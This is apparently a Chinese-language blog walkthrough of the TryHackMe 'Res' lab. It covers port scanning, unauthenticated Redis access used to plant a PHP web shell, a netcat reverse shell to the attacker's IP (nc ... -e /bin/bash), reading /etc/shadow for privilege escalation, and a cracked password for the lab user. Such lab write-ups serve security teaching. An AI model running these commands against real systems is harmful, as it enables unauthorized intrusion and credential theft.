【THM】Res-Practice
【THM】Res-Practice
hihopkc本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/res
Difficulty: Easy
端口扫描
1 | nmap -p- -sC -sV -T4 10.10.253.248 |
1 | Nmap scan report for 10.10.253.248 |
访问80端口是
查看源代码,我们看不到任何隐藏的内容。我使用 Dirsearch 运行目录扫描,看看是否能找到任何隐藏的目录。不幸的是,找不到隐藏的目录。是时候转到端口 6379 并枚举 Redis 了
Exploit
1 | redis-cli -h $IP |
默认情况下,无需凭据即可访问 Redis。但是,它可以配置为仅支持密码或用户名 + 密码。在我们的例子中,无需任何凭据即可访问 Redis。我们只需输入“info”命令即可检查这一点
从上面我们可以看出我们有一个潜在的用户名:vianka。从 Hack Tricks 网站上,我们可以看到我们可以按如下方式获得 RCE
通过标题,我们知道是ngnix服务器将其html数据存储在/var/www/html上
1 | http://$IP/shell.php?cmd=id |
it works
这台机器确实有nc。因此,让我们使用它在端口 9001 上连接回我们。
1 | http://10.10.253.248//shell.php?cmd=nc 10.11.63.201 9001 -e /bin/bash |
PrivEsc
1 | LFILE=/etc/shadow |
发现不行
这个可以
vianka:beautiful1
ROOT
她可以将 sudo 与任何命令一起使用
知识点
当我想再次爆破的时候发现
1 | ┌──(root㉿kali)-[~/Desktop] |
网上一查
已经对该文件爆破过,则不会进行二次爆破,可以通过命令来查看已经爆破出来的密码。
1 | ┌──(root㉿kali)-[~/Desktop] |
评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果